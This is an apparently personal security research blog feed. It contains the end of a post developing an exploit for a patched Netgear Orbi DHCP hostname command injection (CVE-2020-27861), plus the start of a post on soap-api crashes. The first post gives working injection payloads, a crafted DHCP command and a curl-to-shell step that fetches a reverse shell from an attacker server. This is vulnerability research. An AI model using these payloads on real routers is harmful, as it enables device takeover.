<p>I then took a look at the function I labeled <code class="language-plaintext highlighter-rouge">get_host_from_file()</code> at line 78 in the image above and learned that this function eventually reads from a file at <code class="language-plaintext highlighter-rouge">/tmp/netscan/attach_device</code>, which contains entries for each client connected to the router, including MAC, IP, and hostname. It parses out the hostname it finds and uses it to fill the static buffer <code class="language-plaintext highlighter-rouge">hostname</code>, which is passed as an argument to <code class="language-plaintext highlighter-rouge">get_host_from_file()</code>. This value is eventually passed as the 4th format string arg to <code class="language-plaintext highlighter-rouge">snprintf()</code> on line 84, which constructs the string that is passed to <code class="language-plaintext highlighter-rouge">system()</code>.</p>

<p>At this point I felt pretty confident this was where the vulnerability occurred, but to get additional confirmation I took a look at the version of <code class="language-plaintext highlighter-rouge">UA_Parser</code> included with a firmware that was released after this bug was fixed (v2.7.3.22) to compare. The only change between the two snippets is that the double quotes surrounding the user-controlled values were replaced with single quotes (also known as ‘strong quotes’), inside which no expansion or meta-character interpretation occurs:</p>

<p><img src="/assets/images/orbi-nday/patched.png" alt="patched" /></p>
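<p>The difference between the two quoting styles is easy to reproduce outside the device. The sketch below is only an illustration: it uses a plain <code class="language-plaintext highlighter-rouge">echo</code> as a stand-in for the real command string, and the <code class="language-plaintext highlighter-rouge">DEMO</code> variable and <code class="language-plaintext highlighter-rouge">run_quoted</code> helper are names I made up.</p>

```python
import subprocess


def run_quoted(value, quote):
    """Paste value between quote characters and hand the string to sh -c.

    This stands in for the snprintf() + system() pair; it is not the
    command UA_Parser actually builds.
    """
    cmd = "echo " + quote + value + quote
    env = {"PATH": "/usr/bin:/bin", "DEMO": "expanded"}
    result = subprocess.run(
        ["sh", "-c", cmd], env=env, capture_output=True, text=True
    )
    return result.stdout.strip()


for candidate in ["$DEMO", "`echo injected`"]:
    print(repr(candidate), "double:", run_quoted(candidate, '"'))
    print(repr(candidate), "single:", run_quoted(candidate, "'"))
```

<p>Inside double quotes the shell still performs parameter expansion and command substitution, while inside single quotes the text is passed through untouched. Single quotes only hold up as long as the value cannot contain a single quote of its own.</p>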

<h3 id="tracing-the-data-from-sink--source">tracing the data from sink → source</h3>

<p>The next thing I needed to figure out was how the hostname value eventually reached this code. As mentioned above, <code class="language-plaintext highlighter-rouge">UA_Parser</code> reads the hostname value from the file <code class="language-plaintext highlighter-rouge">/tmp/netscan/attach_device</code>. I didn’t find any other references to this file in <code class="language-plaintext highlighter-rouge">UA_Parser</code> that indicated it writing to the file, so I used grep to recursively search the root filesystem I had extracted from the firmware image to find other files that referenced it. This is when I came across the binary <code class="language-plaintext highlighter-rouge">/usr/sbin/net-scan</code> which seemed like a good lead given the name.</p>

<p>After spending some time going through the code in Ghidra, I eventually found the function used to write <code class="language-plaintext highlighter-rouge">/tmp/netscan/attach_device</code> which I labeled <code class="language-plaintext highlighter-rouge">update_attach_devices()</code>. There was only a single reference to this function, which occurred within another function that appeared to be the main entrypoint to trigger a ‘device scan’; this function is also only referenced once (from <code class="language-plaintext highlighter-rouge">main()</code>):</p>

<p><img src="/assets/images/orbi-nday/init-scan.png" alt="init-scan-devices" /></p>

<p>Naturally, my next question was about where/how <code class="language-plaintext highlighter-rouge">net-scan</code> was getting the values <em>it</em> used to populate the attached devices file. I spent some more time looking through the decompiled code and eventually came across a function that opened a file at <code class="language-plaintext highlighter-rouge">/tmp/dhcpd_hostlist</code> for reading. This caught my attention because the advisory for the vulnerability mentioned that a “<em>crafted Host Name option in a DHCP request can trigger execution of a system call</em>”, so it made sense that <code class="language-plaintext highlighter-rouge">net-scan</code> would get its values from whatever the DHCP server had received.</p>

<p>Another recursive grep later, I had confirmed that the DHCP server binaries (<code class="language-plaintext highlighter-rouge">/sbin/udhcpd</code> and <code class="language-plaintext highlighter-rouge">/sbin/udhcpd-ext</code>) contained references to <code class="language-plaintext highlighter-rouge">/tmp/dhcpd_hostlist</code>. Since the source code for udhcp is included in the GPL sources for the device provided by the vendor, I took a look there and found the string in <code class="language-plaintext highlighter-rouge">leases.h</code> as a constant called <code class="language-plaintext highlighter-rouge">HOSTNAME_SHOWFILE</code>. This value is used in some custom code in a function called <code class="language-plaintext highlighter-rouge">show_clients_hostname()</code> in <code class="language-plaintext highlighter-rouge">dhcpd.c</code> (shown below at line 111) which writes the MAC/IP and hostname for each lease in the global <code class="language-plaintext highlighter-rouge">leases</code> structure to this file.</p>

<p><img src="/assets/images/orbi-nday/dhcp-a.png" alt="dhcpd-code-1" /></p>

<p><br />
Below is a snippet of code from <code class="language-plaintext highlighter-rouge">sendACK()</code> in <code class="language-plaintext highlighter-rouge">serverpacket.c</code>, one of two locations where <code class="language-plaintext highlighter-rouge">show_clients_hostname()</code> is called. One detail that became really important later is the call to <code class="language-plaintext highlighter-rouge">toupper()</code> on line 535: it’s called for each character in the hostname string before the string is saved to the lease object. This causes all letters to be uppercased in the value that’s written out to <code class="language-plaintext highlighter-rouge">/tmp/dhcpd_hostlist</code> and eventually ends up in the vulnerable call to <code class="language-plaintext highlighter-rouge">system()</code>.</p>

<p><img src="/assets/images/orbi-nday/dhcp-b.png" alt="dhcpd-code-2" /></p>

<h3 id="summary-of-the-analysis">summary of the analysis</h3>

<ul>
  <li>the vulnerability occurs in <code class="language-plaintext highlighter-rouge">UA_Parser</code> due to a call to <code class="language-plaintext highlighter-rouge">system()</code> using a string containing an attacker-controlled hostname value</li>
  <li><code class="language-plaintext highlighter-rouge">UA_Parser</code> reads the hostname value from <code class="language-plaintext highlighter-rouge">/tmp/netscan/attach_device</code></li>
  <li><code class="language-plaintext highlighter-rouge">UA_Parser</code> is executed by a binary called <code class="language-plaintext highlighter-rouge">net-scan</code> used to detect attached devices</li>
  <li><code class="language-plaintext highlighter-rouge">net-scan</code> creates the file <code class="language-plaintext highlighter-rouge">/tmp/netscan/attach_device</code></li>
  <li><code class="language-plaintext highlighter-rouge">net-scan</code> reads the hostname values from the file <code class="language-plaintext highlighter-rouge">/tmp/dhcpd_hostlist</code></li>
  <li><code class="language-plaintext highlighter-rouge">/tmp/dhcpd_hostlist</code> is created by <code class="language-plaintext highlighter-rouge">udhcpd</code> using the hostnames saved in its global leases array</li>
  <li><code class="language-plaintext highlighter-rouge">udhcpd</code> populates the hostname field for each lease struct in the global array using values received in DHCP REQUEST packets</li>
</ul>

<h2 id="testing-setup">testing setup</h2>

<h3 id="debugging">debugging</h3>

<p>I created the following GDB script to set breakpoints on <code class="language-plaintext highlighter-rouge">main()</code> and <code class="language-plaintext highlighter-rouge">system()</code> when I attached to <code class="language-plaintext highlighter-rouge">UA_Parser</code>, as well as to set the follow-fork-mode setting so the debugger follows the processes as they spawn.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">set </span>breakpoint pending on
<span class="nb">set </span>follow-fork-mode child
<span class="nb">break </span>main
commands 1
<span class="nb">set </span>follow-fork-mode parent
<span class="k">continue
</span>end

<span class="nb">break </span>system
commands 2
info args
backtrace full
info frame
info registers
x/s <span class="nv">$r0</span>
x/s <span class="nv">$r1</span>
x/s <span class="nv">$r2</span>
<span class="k">continue
</span>end
</code></pre></div></div>

<p><code class="language-plaintext highlighter-rouge">net-scan</code> runs periodically in the background on the device but a re-scan can also be manually triggered by loading the “Attached Devices” page in the web admin UI. This is what I used during testing to force it to run the vulnerable code. Interestingly, I later discovered it would run even with unauthenticated requests to the homepage, so an attacker would actually be able to trigger the vulnerable code on-demand.</p>

<p>Below is a screenshot of the GDB script breaking on <code class="language-plaintext highlighter-rouge">system()</code> while attached to the <code class="language-plaintext highlighter-rouge">UA_Parser</code> process and triggering the vulnerable code. The argument that was passed to <code class="language-plaintext highlighter-rouge">system()</code> can be seen near the bottom of the register listing (the call to ‘devices_info update …’).</p>

<p><img src="/assets/images/orbi-nday/gdb-uaparser.png" alt="gdb-uaparser" /></p>

<h3 id="payload-delivery">payload delivery</h3>

<p>In order to send custom DHCP hostname values easily and establish DHCP connections, I used <code class="language-plaintext highlighter-rouge">udhcpc</code>, which allows for passing in a custom hostname at the command line. I used this command after connecting to the Orbi using a static IP and confirmed the payload appeared in the relevant files.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">sudo</span> ./udhcpc <span class="nt">-H</span> <span class="s2">"</span><span class="se">\$</span><span class="s2">PATH"</span> <span class="nt">-f</span> <span class="nt">-i</span> &lt;interface&gt; <span class="nt">-n</span>
</code></pre></div></div>
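<p>On the wire, the hostname travels as the DHCP Host Name option, which is option code 12 encoded as a code byte, a length byte, and the raw value. The sketch below only builds that option; it does not send anything, and the helper name <code class="language-plaintext highlighter-rouge">hostname_option</code> is my own.</p>

```python
def hostname_option(hostname):
    """Encode a DHCP Host Name option (code 12) as code, length, value."""
    data = hostname.encode("ascii")
    # The length field is a single byte, so the value must fit in 1-255 bytes.
    if len(data) not in range(1, 256):
        raise ValueError("option value must be 1-255 bytes long")
    return bytes([12, len(data)]) + data


# The escaped "\$PATH" in the shell command above sends the literal text $PATH.
print(hostname_option("$PATH").hex())
```

<p>Nothing in this encoding restricts which characters the value may contain, so any filtering has to happen on the receiving side.</p>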

<p>With everything set up to be able to deliver payloads, it was time to start building one.</p>

<h2 id="crafting-payloads">crafting payloads</h2>

<h3 id="using-parametersubstring-expansion-to-build-a-payload">using parameter+substring expansion to build a payload</h3>

<p>As mentioned earlier in this post, each character in the hostname value that <code class="language-plaintext highlighter-rouge">udhcpd</code> receives from clients is uppercased before it’s saved to the global <code class="language-plaintext highlighter-rouge">leases</code> array and eventually written to <code class="language-plaintext highlighter-rouge">/tmp/dhcpd_hostlist</code>. This means that by the time <code class="language-plaintext highlighter-rouge">UA_Parser</code> reads these values from <code class="language-plaintext highlighter-rouge">/tmp/netscan/attach_device</code>, a payload like <code class="language-plaintext highlighter-rouge">$(reboot)</code> would be transformed to <code class="language-plaintext highlighter-rouge">$(REBOOT)</code>. Linux and native Linux file systems are case-sensitive, which means any such payload would fail to execute the desired program. So, I needed to find a way to call binaries using only uppercase letters, numbers, and symbols.</p>

<p>My first thought was I would likely need to use shell expansion and environment variables since they typically use uppercase names. I did a bit of Googling and came across <a href="https://wiki.bash-hackers.org/syntax/pe">this page</a> about bash parameter expansion, which seemed like a viable way to construct a working payload. Specifically, I thought <a href="https://wiki.bash-hackers.org/syntax/pe#substring_expansion">substring expansion</a> could be used to slice up pieces of environment variables to grab the characters needed to build a payload. With this in mind, I checked what environment variables were available in the shell for root (the UA_Parser process runs as root) and quickly realized I would have to get pretty creative given what was there.</p>

<p><img src="/assets/images/orbi-nday/env-listing.png" alt="env" /></p>

<p>I played around with different patterns in the shell while connected via serial and eventually found one that made use of both parameter and filename expansion, which would expand out to <code class="language-plaintext highlighter-rouge">/sbin/reboot</code> built up from characters sliced from the <code class="language-plaintext highlighter-rouge">$PATH</code> env variable:</p>

<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">${</span><span class="nv">PATH</span>:4:5<span class="k">}</span>/<span class="k">${</span><span class="nv">PATH</span>:3:1<span class="k">}</span>?????
</code></pre></div></div>

<p>In this context, the <code class="language-plaintext highlighter-rouge">?</code> symbol matches exactly one character, so the expansion works because <code class="language-plaintext highlighter-rouge">reboot</code> is the only binary in <code class="language-plaintext highlighter-rouge">/sbin</code> that starts with <code class="language-plaintext highlighter-rouge">r</code> followed by exactly 5 characters. The screenshot below shows the final payload constructed piece by piece.</p>

<p><img src="/assets/images/orbi-nday/payload-v1.png" alt="payload-v1" /></p>
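<p>The two expansion steps can be mimicked with a string slice and a glob match, which is handy for trying out offsets without a shell on the device. This is a sketch: the <code class="language-plaintext highlighter-rouge">PATH</code> value is the one from the device’s environment, but the <code class="language-plaintext highlighter-rouge">sbin</code> listing is a hypothetical subset I made up to illustrate the match.</p>

```python
from fnmatch import fnmatchcase

PATH = "/usr/sbin:/usr/bin:/sbin:/bin"  # root's PATH on the device


def substr(value, offset, length):
    """Python equivalent of the shell's ${value:offset:length}."""
    return value[offset:offset + length]


# ${PATH:4:5}/${PATH:3:1}????? after parameter expansion.
pattern = substr(PATH, 4, 5) + "/" + substr(PATH, 3, 1) + "?????"

# Hypothetical subset of /sbin, only here to show how the glob narrows down.
sbin = ["/sbin/reboot", "/sbin/route", "/sbin/rmmod", "/sbin/ifconfig"]
matches = [path for path in sbin if fnmatchcase(path, pattern)]

print(pattern, matches)
```

<p>Each <code class="language-plaintext highlighter-rouge">?</code> has to consume one character, so names that start with <code class="language-plaintext highlighter-rouge">r</code> but have a different length fall out of the match.</p>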

<p>The final step was to place this payload within a shell context using command substitution so that once the string expanded out it would be interpreted as a command. To do this I wrapped the payload inside <code class="language-plaintext highlighter-rouge">$()</code> syntax and set everything up to do a test run. After getting a DHCP lease with the crafted request and attaching to the running <code class="language-plaintext highlighter-rouge">UA_Parser</code> process, I loaded the Attached Devices page in the web UI and caused <code class="language-plaintext highlighter-rouge">net-scan</code> to run. Easy peasy, right?</p>

<p>Yeah, right. It’s never that easy.</p>

<h3 id="more-constraints-html-encoding">more constraints: html encoding</h3>

<p>The screenshot below shows the debugger output when catching the vulnerable call to <code class="language-plaintext highlighter-rouge">system()</code> with the payload above.</p>

<p><img src="/assets/images/orbi-nday/html-encode.png" alt="html-encoding" /></p>

<p>This is when I discovered there was <em>some</em> filtering happening and certain characters are HTML encoded. Specifically, the parentheses are encoded in the payload above. I went back through the code for <code class="language-plaintext highlighter-rouge">net-scan</code> and found the function responsible for the encoding. The full list of encoded characters is:</p>

<ul>
  <li><code class="language-plaintext highlighter-rouge">&lt; &gt; ( ) &amp; ' " \</code></li>
</ul>

<p>I also learned that <code class="language-plaintext highlighter-rouge">net-scan</code> truncates the hostname string read from the DHCP host list at 32 characters before writing it to <code class="language-plaintext highlighter-rouge">/tmp/netscan/attach_device</code>.</p>

<p>Pretty rough! Almost every useful character (in regards to shell manipulation) is encoded and there’s a pretty tight length limit, which only makes writing a functional exploit that much more difficult. But, first I had to get code execution, so I pushed on.</p>

<h3 id="success-backquote-command-substitution">success: backquote command substitution</h3>

<p>There was really only one other option left to get command execution, considering parentheses were filtered, and that was to use the older backquote form of command substitution:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="sb">`</span><span class="k">${</span><span class="nv">PATH</span>:4:5<span class="k">}</span>/<span class="k">${</span><span class="nv">PATH</span>:3:1<span class="k">}</span>?????<span class="sb">`</span>
</code></pre></div></div>

<p>I did the usual dance to connect and send a DHCP request while attached to the UA_Parser process with GDB. After triggering <code class="language-plaintext highlighter-rouge">net-scan</code> again, I caught the call to <code class="language-plaintext highlighter-rouge">system()</code> and saw that a new chain of calls had occurred and <code class="language-plaintext highlighter-rouge">reboot</code> had been called. The device then began to reboot!</p>

<p><img src="/assets/images/orbi-nday/success-1.png" alt="success-1" /></p>

<p>And there it is, a working proof-of-concept showing the bug could be exploited…</p>

<h2 id="escaping-constraints-arbitrary-code-execution">escaping constraints: arbitrary code execution</h2>

<p>Okay, but rebooting the device isn’t particularly cool. Now it was time to think about what could actually be done with the bug.</p>

<p>To recap, the constraints for the payload are:</p>

<ul>
  <li>32 character length limit</li>
  <li>All letters get uppercased</li>
  <li>Filtered chars: <code class="language-plaintext highlighter-rouge">&lt; &gt; ( ) &amp; ' " \</code></li>
  <li>must build payload from chars in env variables + file/parameter expansion:
    <ul>
      <li><code class="language-plaintext highlighter-rouge">PATH=/usr/sbin:/usr/bin:/sbin:/bin</code></li>
      <li><code class="language-plaintext highlighter-rouge">HOME=/tmp</code></li>
      <li><code class="language-plaintext highlighter-rouge">HOSTNAME=RBR20</code></li>
    </ul>
  </li>
</ul>
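<p>With so many rules in play, a small checker saves a lot of round trips to the device. The sketch below encodes only the three constraints listed above. It assumes the 32-character limit applies to the hostname before encoding, which I did not verify, and the function name is my own.</p>

```python
FILTERED = set("<>()&'\"\\")  # characters net-scan HTML-encodes
MAX_LEN = 32                   # hostname is truncated at 32 characters


def check_payload(payload):
    """Return a list of reasons the payload would not survive intact."""
    problems = []
    if len(payload) > MAX_LEN:
        problems.append("too long by %d" % (len(payload) - MAX_LEN))
    bad = sorted(set(payload) & FILTERED)
    if bad:
        problems.append("filtered: " + " ".join(bad))
    if payload != payload.upper():
        problems.append("lowercase letters will be uppercased")
    return problems


for candidate in [
    "$(reboot)",
    "$(${PATH:4:5}/${PATH:3:1}?????)",
    "`${PATH:4:5}/${PATH:3:1}?????`",
]:
    print(candidate, check_payload(candidate))
```

<p>An empty list means the payload passes all three checks. It says nothing about whether the expansion resolves to the intended binary, so that still has to be tested in a shell.</p>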

<p>The length limit was probably the most frustrating part of this whole thing when combined with the uppercasing issue — it could easily take 7-9 characters to do the expansion needed to grab a single character for the final payload, so using up those 32 characters was <strong>very</strong> easy. The inability to use <code class="language-plaintext highlighter-rouge">&gt;</code> or <code class="language-plaintext highlighter-rouge">&lt;</code> also meant using redirection to overwrite files wasn’t an option.</p>

<p>With all of this in mind, I narrowed down the possible attack scenarios to the following:</p>

<ul>
  <li>Leak admin credentials back to the attacker somehow</li>
  <li>Reset the admin password</li>
  <li>Download and execute a script to run arbitrary commands without dealing with constraints</li>
</ul>

<p>I spent a couple of days experimenting with what felt like hundreds of payloads and possible angles to achieve one of the results above. Again, that length limit SUCKED — on multiple occasions I had figured out working payloads that ended up exceeding the limit by 1-2 characters and immediately became useless. At the end of each session I would tell myself I would give up and that it just wasn’t possible to do anything useful given the restrictions. Then the next day when I signed back on I would get sucked back in, convinced there just had to be a way.</p>

<h3 id="going-after-curl">going after curl</h3>
<p>After tons of failed attempts, I eventually came to a conclusion: in order to do <em>anything</em> useful, I would need to find a way to break out of / get around the length limit. Having determined this, I knew the only feasible way forward would be to find a way to download a script from a remote source and run it, which would avoid the uppercasing issues, length limits, etc. With this in mind, I shifted my focus to figuring out a way to use the <code class="language-plaintext highlighter-rouge">curl</code> or <code class="language-plaintext highlighter-rouge">wget</code> binaries on the router to achieve this.</p>

<p>This finally paid off after another couple of hacking sessions when I figured out the following payload:</p>

<p><img src="/assets/images/orbi-nday/curl-1.jpeg" alt="curl-payload" /></p>

<p>The first part makes use of expansion to match <code class="language-plaintext highlighter-rouge">/usr/bin/curl</code>, which is used to make a request to a server (<code class="language-plaintext highlighter-rouge">hy.me</code> in this example), and pipes the contents of the response to a shell (pointed to by <code class="language-plaintext highlighter-rouge">$0</code>).</p>

<p>In order to test this and show it working without having to actually go out and buy a two character domain (which apparently go for anywhere between $500 - $15k), I edited <code class="language-plaintext highlighter-rouge">/etc/hosts</code> on the device to add a record pointing <code class="language-plaintext highlighter-rouge">hy.me</code> to my ‘evil’ server where I was running a Python web server that would respond with the contents of a shell script to requests for the root path (to use as few characters as possible).</p>

<p>The screenshot below shows everything in action, going <strong>counter-clockwise</strong> starting at the top-left:</p>

<ul>
  <li>the udhcpc process that sent the payload</li>
  <li>the code for the Python webapp that returns code to spawn a reverse shell</li>
  <li>the running webapp showing requests were received from the Orbi</li>
  <li>(open telnet session, unrelated)</li>
  <li>the netcat listener receiving the connection from reverse shell</li>
</ul>

<p><img src="/assets/images/orbi-nday/reverse-shell.png" alt="reverse-shell" /></p>

<h2 id="conclusion">conclusion</h2>

<p>There it is: there’s now an exploit for CVE-2020-27861 and it can be used to completely take over a vulnerable Orbi device. In total, it took about a week to go from starting the initial analysis to finally getting arbitrary code execution, with most of the time being spent on figuring out how to create a payload to actually do something useful given the restrictions. It was pretty fun and I was able to pick up some new techniques for dealing with payload constraints for command execution.</p>

<p>The most important lesson learned? <strong>Persistence pays off</strong> (usually). I really didn’t think a full exploit would be possible and almost gave up before getting full system control, but I’m glad I kept pushing. I’ll probably start spending more time doing this kind of n-day research and monitoring advisories for specific devices/applications to hopefully be able to do this for a more recent vuln.</p>

<h2 id="resources">resources</h2>

<ul>
  <li><a href="https://kb.netgear.com/000062507/Security-Advisory-for-Unauthenticated-Command-Injection-Vulnerability-on-Some-Extenders-and-Orbi-WiFi-Systems-PSV-2020-0301">Netgear Advisory</a></li>
  <li><a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=2020-27861">Mitre CVE listing: CVE-2020-27861</a></li>
  <li><a href="https://wiki.bash-hackers.org/syntax/pe">Parameter expansion [Bash Hackers]</a></li>
  <li><a href="https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md">PayloadsAllTheThings Reverse Shell Cheatsheet</a></li>
</ul>]]></content><author><name>hyper</name></author><category term="research" /><category term="ndays" /><category term="exploit-dev" /><category term="orbi" /><category term="netgear" /><category term="iot" /><summary type="html"><![CDATA[rediscovering and developing a weaponized exploit for a command injection vulnerability in Orbi wifi systems that was reported and patched last year.]]></summary><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blog.coffinsec.com/assets/images/orbi-connect.png" /><media:content medium="image" url="https://blog.coffinsec.com/assets/images/orbi-connect.png" xmlns:media="http://search.yahoo.com/mrss/" /></entry><entry><title type="html">orbi hunting 0x1: crashes in soap-api</title><link href="https://blog.coffinsec.com/research/2022/06/19/orbi-hunting-1-soap-api-crashes.html" rel="alternate" type="text/html" title="orbi hunting 0x1: crashes in soap-api" /><published>2022-06-19T00:00:00+00:00</published><updated>2022-06-19T00:00:00+00:00</updated><id>https://blog.coffinsec.com/research/2022/06/19/orbi-hunting-1-soap-api-crashes</id><content type="html" xml:base="https://blog.coffinsec.com/research/2022/06/19/orbi-hunting-1-soap-api-crashes.html"><![CDATA[<p>The second part in this series going over my time hunting for bugs on the Netgear Orbi. This post is a walkthrough of a <em>long</em> journey that began with the discovery of a buffer overflow which I initially thought was unreachable due to a <em>separate</em> null pointer dereference. I eventually found a way to get past that null deref, only to ultimately be thwarted by a stack canary that couldn’t be easily bypassed (at least, not by me). So, free 0day for anyone that <em>can</em> exploit it? Hit me up on twitter to let me know how you did it.</p>

<h2 id="introduction">introduction</h2>
<p>The Orbi provides a SOAP server which seems to primarily be used by the Netgear mobile application, reachable at <code class="language-plaintext highlighter-rouge">http://&lt;ROUTER&gt;/soap/server_sa</code>. I had originally discovered this endpoint early on when I started looking at this router, but it wasn’t until I had connected over serial that I realized it was incredibly easy to crash the binary that handles SOAP requests, <code class="language-plaintext highlighter-rouge">/usr/sbin/soap-api</code>. In fact, almost every request I sent to this endpoint caused a stack trace to be printed to the console. This seemed like a good enough place to start so I decided to figure out exactly what caused these crashes and whether any of it was exploitable.</p>

<p>Note: I chose to write about this issue and not report it to Netgear since merely crashing the <code class="language-plaintext highlighter-rouge">soap-api</code> process does very little and doesn’t even really work as a denial-of-service mechanism because a new process is spawned on each request. As far as I can tell there’s no security impact here.</p>

<h3 id="background">background</h3>

<p>The SOAP server parses the HTTP header <code class="language-plaintext highlighter-rouge">SOAPAction</code> on incoming requests to determine which SOAP action/method the user wants to trigger. The request is initially handled by lighttpd, where <code class="language-plaintext highlighter-rouge">mod_cgi</code> handles initial processing and passes it on to <code class="language-plaintext highlighter-rouge">soap-api</code>. The server sets environment variables that describe the request, which <code class="language-plaintext highlighter-rouge">soap-api</code> then reads in order to handle it.</p>

<p>The format of the <code class="language-plaintext highlighter-rouge">SOAPAction</code> header is:</p>
<ul>
  <li><code class="language-plaintext highlighter-rouge">&lt;urn:VENDOR:service:ACTION_str:1#METHOD_str</code> .</li>
</ul>
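
<p>To make that layout concrete, here is a minimal C sketch of how the action and method parts could be split out of a value in this format. The function name <code class="language-plaintext highlighter-rouge">split_soap_action</code> and the in-place splitting approach are my own assumptions for illustration; this is not code recovered from <code class="language-plaintext highlighter-rouge">soap-api</code>.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#include &lt;stddef.h&gt;
#include &lt;string.h&gt;

/* Hypothetical helper (not from the soap-api binary): splits a header value
 * shaped like "urn:VENDOR:service:ACTION:1#METHOD" in place.
 * On success returns 0 and points *action and *method into hdr. */
int split_soap_action(char *hdr, char **action, char **method)
{
    static const char marker[] = "service:";
    char *svc, *colon, *hash;

    svc = strstr(hdr, marker);
    if (svc == NULL)
        return -1;
    svc += sizeof(marker) - 1;      /* skip past "service:" */

    hash = strchr(svc, '#');        /* the method follows the '#' */
    if (hash == NULL)
        return -1;
    *hash = '\0';

    colon = strchr(svc, ':');       /* cut the ":1" version suffix, if present */
    if (colon != NULL)
        *colon = '\0';

    *action = svc;
    *method = hash + 1;
    return 0;
}
</code></pre></div></div>

<p>Note that nothing in a split like this limits how long the method part can be, which is the property the rest of this post depends on.</p>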

<h3 id="crash-discovery">crash discovery</h3>

<p>While doing some manual testing after starting with a known-good <code class="language-plaintext highlighter-rouge">SOAPAction</code> header value, I found that the server would send the following response when submitting a <code class="language-plaintext highlighter-rouge">METHOD_str</code> part that is 248 characters or longer, while simultaneously causing a crash dump to be printed to the console.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>HTTP/1.1 200 OK
Content-Length: 763
Content-Type: text/xml; charset="UTF-8"
Server: Linux/2.6.15 uhttpd/1.0.0 soap/1.0
Connection: close
Date: Fri, 25 Jun 2021 14:09:01 GMT

&lt;?xml version="1.0" encoding="UTF-8"?&gt;
&lt;SOAP-ENV:Envelope
   xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
   SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"&gt;
&lt;SOAP-ENV:Body&gt;
&lt;m:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAResponse xmlns:m="urn:NETGEAR-ROUTER:service:x:1"&gt;&lt;/m:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&lt;/SOAP-ENV:Body&gt;
&lt;/SOAP-ENV:Envelope&gt;
</code></pre></div></div>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>SOAP Len:0 Action:x Method:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgd = d7854000
[00000000] *pgd=00000000

CPU: 3 PID: 26769 Comm: soap-api Tainted: P             3.14.77 #1
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAtask: dce74380 ti: d6014000 task.ti: d6014000
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAPC is at 0xb6b52db4
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALR is at 0xb6b4ee88
AAAAAAAAAAAAAAAAAAA IP:10.13.13.211

pc : [&lt;b6b52db4&gt;]    lr : [&lt;b6b4ee88&gt;]    psr: 60000010
sp : befff398  ip : 7f5fce58  fp : 7f6026fc
r10: befff424  r9 : befff44c  r8 : befff48c
r7 : befff54c  r6 : befff400  r5 : 7f5d4594  r4 : 00000000
r3 : 00000000  r2 : 00000001  r1 : 00000000  r0 : 00000000
Flags: nZCv  IRQs on  FIQs on  Mode USER_32  ISA ARM  Segment user
Control: 10c5387d  Table: 9785406a  DAC: 00000015
CPU: 3 PID: 26769 Comm: soap-api Tainted: P             3.14.77 #1
[&lt;c021ea68&gt;] (unwind_backtrace) from [&lt;c021bb60&gt;] (show_stack+0x10/0x14)
[&lt;c021bb60&gt;] (show_stack) from [&lt;c03b5518&gt;] (dump_stack+0x78/0x98)
[&lt;c03b5518&gt;] (dump_stack) from [&lt;c02234b0&gt;] (__do_user_fault+0x74/0xbc)
[&lt;c02234b0&gt;] (__do_user_fault) from [&lt;c022385c&gt;] (do_page_fault+0x2f0/0x370)
[&lt;c022385c&gt;] (do_page_fault) from [&lt;c02083dc&gt;] (do_DataAbort+0x34/0x98)
[&lt;c02083dc&gt;] (do_DataAbort) from [&lt;c02096f4&gt;] (__dabt_usr+0x34/0x40)
Exception stack(0xd6015fb0 to 0xd6015ff8)
5fa0:                                     00000000 00000000 00000001 00000000
5fc0: 00000000 7f5d4594 befff400 befff54c befff48c befff44c befff424 7f6026fc
5fe0: 7f5fce58 befff398 b6b4ee88 b6b52db4 60000010 ffffffff
</code></pre></div></div>

<p>Unfortunately, it was nearly impossible to identify where the crash was actually happening from the crash dump alone, as the stack trace only shows the top of the call stack containing the chain of calls in the kernel that handled the fault. Since the stack trace was no help, I figured the next step was to load <code class="language-plaintext highlighter-rouge">soap-api</code> up in Ghidra, find where the SOAPAction header was being parsed, and trace it through the application, looking for places where it could overflow a buffer.</p>

<h2 id="first-find-buffer-overflow-in-sendsoapresponse">first find: buffer overflow in SendSoapResponse()</h2>

<p>After digging through functions in the binary for a while and looking for strings that looked familiar/related to the output I was getting from the server, I found the following piece of code in the function at <code class="language-plaintext highlighter-rouge">0x0003e82c</code>. From looking at the non-stripped versions of this binary, I was able to identify this function as <code class="language-plaintext highlighter-rouge">SendSoapResponse</code>. This function is responsible for constructing the HTTP response, including the response headers, sent to the client.</p>

<p><img src="/assets/images/orbi-ghidra1.png" alt="ghidra" /></p>

